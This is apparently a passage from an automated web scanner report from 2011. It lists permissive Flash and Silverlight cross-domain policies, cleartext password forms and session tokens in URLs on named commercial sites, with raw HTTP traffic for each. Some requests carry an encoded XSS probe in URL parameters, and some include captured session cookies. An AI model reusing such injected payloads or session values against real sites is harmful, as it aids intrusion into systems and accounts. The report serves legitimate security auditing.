Summary

Severity:   Low
Confidence:   Certain
Host:   http://login.dotomi.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: login.dotomi.com

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:32:42 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2
X-Name: dmc-s09
Last-Modified: Tue, 08 Sep 2009 04:16:43 GMT
ETag: "8d6006f-a1-473093bdbc0c0"
Accept-Ranges: bytes
Content-Length: 161
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!-- http://*.dotomi.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*.dotomi.com" />
</cross-domain-policy>

5.24. http://pagead2.googlesyndication.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Fri, 02 Sep 2011 23:20:19 GMT
Expires: Sat, 03 Sep 2011 23:20:19 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 85471
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

5.25. http://w.sharethis.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://w.sharethis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: w.sharethis.com

Response

HTTP/1.0 200 OK
Server: nginx/0.8.53
Content-Type: text/xml
Content-Length: 330
Last-Modified: Mon, 29 Aug 2011 16:55:44 GMT
Accept-Ranges: bytes
X-N: S
Date: Sat, 03 Sep 2011 21:33:13 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

5.26. http://www.godaddy.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.godaddy.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 03 Sep 2011 21:30:14 GMT
Connection: close
Content-Length: 150

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.wsimg.com" /><allow-access-from domain="*.godaddy.com" /></cross-domain-policy>

5.27. https://www.godaddy.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.godaddy.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 03 Sep 2011 21:47:31 GMT
Connection: close
Content-Length: 150

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.wsimg.com" /><allow-access-from domain="*.godaddy.com" /></cross-domain-policy>

5.28. http://www.youtube-nocookie.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.youtube-nocookie.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtube-nocookie.com

Response

HTTP/1.0 200 OK
Date: Sat, 03 Sep 2011 17:32:20 GMT
Server: Apache
Last-Modified: Thu, 01 Sep 2011 18:22:13 GMT
ETag: "132-4abe552de3f40"
Accept-Ranges: bytes
Content-Length: 306
Content-Type: application/xml

<?xml version="1.0"?>
<!-- http://www.youtube.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="s.ytimg.com" />
...[SNIP]...

5.29. http://stats.wordpress.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.wordpress.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: stats.wordpress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 03 Sep 2011 21:36:42 GMT
Content-Type: text/xml
Connection: close
Content-Length: 585
Last-Modified: Wed, 27 Apr 2011 19:00:53 GMT
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><site-control permitted-cross-domain-policies="master-only" /><allow-access-from domain="v.wordpress.com" to-ports="80,443" /><allow-access-from domain="v0.wordpress.com" to-ports="80,443" secure="false" /><allow-access-from domain="videopress.com" to-ports="80,443" secure="false" /><allow-access-from domain="s0.videopress.com" to-ports="80,443" secure="false" /><allow-access-from domain="realeyes.com" to-ports="80,443" />
...[SNIP]...

6. Silverlight cross-domain policy  previous  next
There are 2 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


6.1. http://stats.wordpress.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.wordpress.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: stats.wordpress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 03 Sep 2011 21:36:42 GMT
Content-Type: text/xml
Connection: close
Content-Length: 309
Last-Modified: Mon, 06 Jun 2011 00:17:52 GMT
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>

...[SNIP]...

6.2. http://value.register.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://value.register.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: value.register.com

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:32:57 GMT
Server: Omniture DC/2.0.0
xserver: www68
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7. Cleartext submission of password  previous  next
There are 2 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


7.1. http://vasco.com/login.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vasco.com
Path:   /login.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /login.aspx?ReturnUrl=%2ftraining%2four_offering%2felearning%2fcertified_ethical_hacking.aspx HTTP/1.1
Host: vasco.com
Proxy-Connection: keep-alive
Referer: http://vasco.com/training/our_offering/elearning/certified_ethical_hacking.aspx
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=scg42x55p3xbinitbik3gp45; __utma=144557234.91160880.1315071157.1315071157.1315071157.1; __utmb=144557234.8.10.1315071157; __utmc=144557234; __utmz=144557234.1315071157.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 03 Sep 2011 17:35:34 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 24790

<? xml version=1.0" encoding=UTF-8" ?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="login.aspx?ReturnUrl=%2ftraining%2four_offering%2felearning%2fcertified_ethical_hacking.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
<td><input name="ctl00$Columns$userLogin$loginUser$Password" type="password" id="ctl00_Columns_userLogin_loginUser_Password" style="width:250px;" /><span id="ctl00_Columns_userLogin_loginUser_PasswordRequired" title="Password is required." style="color:Red;visibility:hidden;">
...[SNIP]...

7.2. http://vasco.com/user_registration.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vasco.com
Path:   /user_registration.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /user_registration.aspx HTTP/1.1
Host: vasco.com
Proxy-Connection: keep-alive
Referer: http://vasco.com/login.aspx?ReturnUrl=%2ftraining%2four_offering%2felearning%2fcertified_ethical_hacking.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=scg42x55p3xbinitbik3gp45; __utma=144557234.91160880.1315071157.1315071157.1315071157.1; __utmb=144557234.9.10.1315071157; __utmc=144557234; __utmz=144557234.1315071157.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 03 Sep 2011 17:35:44 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 42057

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<body>
   <form name="aspnetForm" method="post" action="user_registration.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
<p><input name="ctl00$Content$_txtstatic_password" type="password" maxlength="50" id="ctl00_Content__txtstatic_password" class="required" style="width:228px" /></p>
...[SNIP]...
<p><input name="ctl00$Content$confirm_password" type="password" maxlength="50" id="ctl00_Content_confirm_password" class="required" style="width:228px" /></p>
...[SNIP]...

8. Session token in URL  previous  next
There are 15 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


8.1. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /bh/set.aspx?action=replace&advid=749&token=DOTM5 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Home&dtmc_product_id=TTN%3A%20Home&dtmc_domain_name=&dtm_items=&dtmc_domain_status=&dtmc_domain_variations=&dtmc_source=WWW000000000W&dtmc_ref=&dtmc_loc=http%3A//www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: cw-app602
Set-Cookie: V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Tue, 28-Aug-2012 21:33:49 GMT; Path=/
Set-Cookie: cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A749%3B09%2F17%2F2011%3BDOTM5; Domain=.contextweb.com; Expires=Sun, 07-Aug-2016 21:33:49 GMT; Path=/
Content-Type: image/gif
Date: Sat, 03 Sep 2011 21:33:49 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

8.2. http://l.sharethis.com/pview  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&source=share4x&publisher=null&hostname=www.hostnj.net&location=%2Fproducts-page%2Fssl-security%2Fcomodo-intranet-ssl-certificate%2F&url=http%3A%2F%2Fwww.hostnj.net%2Fproducts-page%2Fssl-security%2Fcomodo-intranet-ssl-certificate%2F&sessionID=1315085425389.39976&fpc=c6276e8-13231331aee-5ff43484-1&ts1315085426455.0&refDomain=www.google.com&refQuery=sourceid%3Dchrome%26ie%3DUTF-8%26q%3Dssl%2Bcertificates%23q%3Dssl%2Bcertificates%26hl%3Den%26prmd%3Divnsufd%26source%3Dlnms%26tbm%3Dshop%26ei%3D_5tiTr_COO_SiAKums2VCg%26sa%3DX%26oi%3Dmode_link%26ct%3Dmode%26cd%3D5%26ved%3D0CFYQ_AUoBA%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Dd8e70e66cd7c7a51%26biw%3D1233%26bih%3D1037 HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.hostnj.net/products-page/ssl-security/comodo-intranet-ssl-certificate/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Sat, 03 Sep 2011 21:36:49 GMT
Connection: keep-alive


8.3. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/omnituremarketing/mbox/standard?mboxHost=www.omniture.com&mboxSession=1315061061832-261883&mboxPC=1313976253453-233900.19&mboxPage=1315061061832-261883&screenHeight=1200&screenWidth=1920&browserWidth=1069&browserHeight=513&browserTimeOffset=-300&colorDepth=16&mboxCount=1&profile.geo_ip=50.23.123.106&profile.geo_zip=75207&profile.geo_gmt_offset=-500&profile.geo_country=usa&profile.geo_country_code=840&profile.geo_region=tx&profile.geo_region_code=44&profile.geo_city=dallas&profile.geo_city_code=77&mbox=omniTargetingInfo&mboxId=0&mboxTime=1315043065881&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss()%7Balert(%2527XSS%2527)%253B%7D&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=40 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 2488
Date: Sat, 03 Sep 2011 14:43:47 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('omniTargetingInfo',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-defaul
...[SNIP]...

8.4. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/sc/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/omnituremarketing/sc/standard?mboxHost=www.omniture.com&mboxSession=1315061061832-261883&mboxPC=1313976253453-233900.19&mboxPage=1315061061832-261883&screenHeight=1200&screenWidth=1920&browserWidth=1069&browserHeight=513&browserTimeOffset=-300&colorDepth=16&mboxCount=9&mbox=SiteCatalyst%3A%20event&mboxId=0&mboxTime=1315043077971&charSet=UTF-8&visitorNamespace=omnituremarketing&cookieLifetime=31536000&pageName=Omniture%3A%20Homepage&currencyCode=USD&channel=Home&server=www.omniture.com&events=event69&resolution=1920x1200&javascriptVersion=1.7&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Czxp%2Cxlsx%2Cdocx%2Cmp4%2Cm4v&linkInternalFilters=javascript%3A%2C207%2C2o7%2Csitecatalyst%2Comniture%2Cwww.registerat.com%2Cthelink.omniture.com&linkTrackVars=None&linkTrackEvents=None&eVar3=Now%20Defined%20by%20Test%20and%20Target&eVar4=English&prop5=Now%20Defined%20by%20Test%20and%20Target&prop6=English&prop14=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss()%7Balert(%2527XSS%2527)%253B%7D&eVar17=8%3A30AM&eVar35=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss()%7Balert(%2527XSS%2527)%253B%7D&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss()%7Balert(%2527XSS%2527)%253B%7D&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=40&scPluginVersion=1 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/

Response

HTTP/1.1 200 OK
Content-Length: 146
Date: Sat, 03 Sep 2011 14:44:01 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').get('SiteCatalyst: event', 0).setOffer(new mboxOfferDefault()).loaded();}

8.5. http://registercom.tt.omtrdc.net/m2/registercom/mbox/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://registercom.tt.omtrdc.net
Path:   /m2/registercom/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/registercom/mbox/standard?mboxHost=www.register.com&mboxSession=1315085400638-452340&mboxPage=1315085400638-452340&screenHeight=1200&screenWidth=1920&browserWidth=1233&browserHeight=1037&browserTimeOffset=-300&colorDepth=16&mboxCount=2&mbox=homepageRedirect&mboxId=0&mboxTime=1315067402071&mboxURL=http%3A%2F%2Fwww.register.com%2F&mboxReferrer=&mboxVersion=39 HTTP/1.1
Host: registercom.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 797
Date: Sat, 03 Sep 2011 21:29:23 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('homepageRedirect',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-default
...[SNIP]...

8.6. http://registercom.tt.omtrdc.net/m2/registercom/sc/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://registercom.tt.omtrdc.net
Path:   /m2/registercom/sc/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/registercom/sc/standard?mboxHost=www.register.com&mboxSession=1315085400638-452340&mboxPage=1315085400638-452340&screenHeight=1200&screenWidth=1920&browserWidth=1233&browserHeight=1037&browserTimeOffset=-300&colorDepth=16&mboxCount=11&mbox=SiteCatalyst%3A%20event&mboxId=0&mboxTime=1315067414617&charSet=ISO-8859-1&visitorNamespace=registercom&pageName=TTN%3A%20Home&currencyCode=USD&channel=TTN%3A%20Home&server=www.register.com&resolution=1920x1200&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls&linkInternalFilters=javascript%3A%2Crodopi%2Cregister&linkTrackVars=None&linkTrackEvents=None&prop6=Unknown&eVar6=Unknown&prop11=Unknown%3A%20TTN%3A%20Home&mboxURL=http%3A%2F%2Fwww.register.com%2F&mboxReferrer=&mboxVersion=39&scPluginVersion=1 HTTP/1.1
Host: registercom.tt.omtrdc.net
Proxy-Connection: keep-alive
